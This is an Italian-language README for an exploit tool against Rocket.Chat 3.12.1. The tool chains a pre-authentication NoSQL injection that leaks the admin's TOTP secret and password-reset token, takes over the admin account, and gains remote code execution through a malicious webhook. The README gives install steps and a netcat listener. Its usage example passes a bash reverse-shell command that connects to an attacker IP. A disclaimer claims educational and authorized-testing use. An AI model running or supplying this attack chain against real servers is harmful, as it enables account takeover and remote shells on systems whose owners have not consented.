
Exploit per Rocket.Chat 3.12.1 RCE tramite iniezione NoSQL pre-auth, perdita del segreto TOTP dell'amministratore e del token di reset della password per ottenere esecuzione di codice remoto attraverso integrazione webhook malevola.
Sfrutta una vulnerabilità di NoSQL injection pre-autenticazione in Rocket.Chat 3.12.1 per divulgare il segreto TOTP dell'admin e il token di reset della password, impossessarsi dell'account admin e ottenere RCE tramite una webhook integration malevola.
Rocket.Chat <= 3.12.1
pip install -r requirements.txt
Prima di eseguire l'exploit, avvia un netcat listener in un terminale separato per ricevere la reverse shell in entrata:
nc -lvnp 4444
Tieni questo terminale aperto. Una volta che l'exploit viene eseguito con successo, la tua shell apparirà qui.
python3 pwn_rocketchat.py \
-t 'http://TARGET:3000' \
-u 'USERNAME' \
-p 'PASSWORD' \
-e '[email protected]' \
-a 'adminusername' \
-c '/bin/bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'
| Flag | Descrizione |
|---|---|
-t | URL del target Rocket.Chat |
-u | Il tuo nome utente registrato con privilegi bassi |
-p | La tua password registrata con privilegi bassi |
-e | Indirizzo email dell'admin |
-a | Nome utente dell'admin |
-c | Comando per la reverse shell |
-v | Modalità verbosa (mostra risposte raw) |
Questo strumento è solo per scopi educativi e test di penetrazione autorizzati. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento. Ottieni sempre la dovuta autorizzazione scritta prima di testare.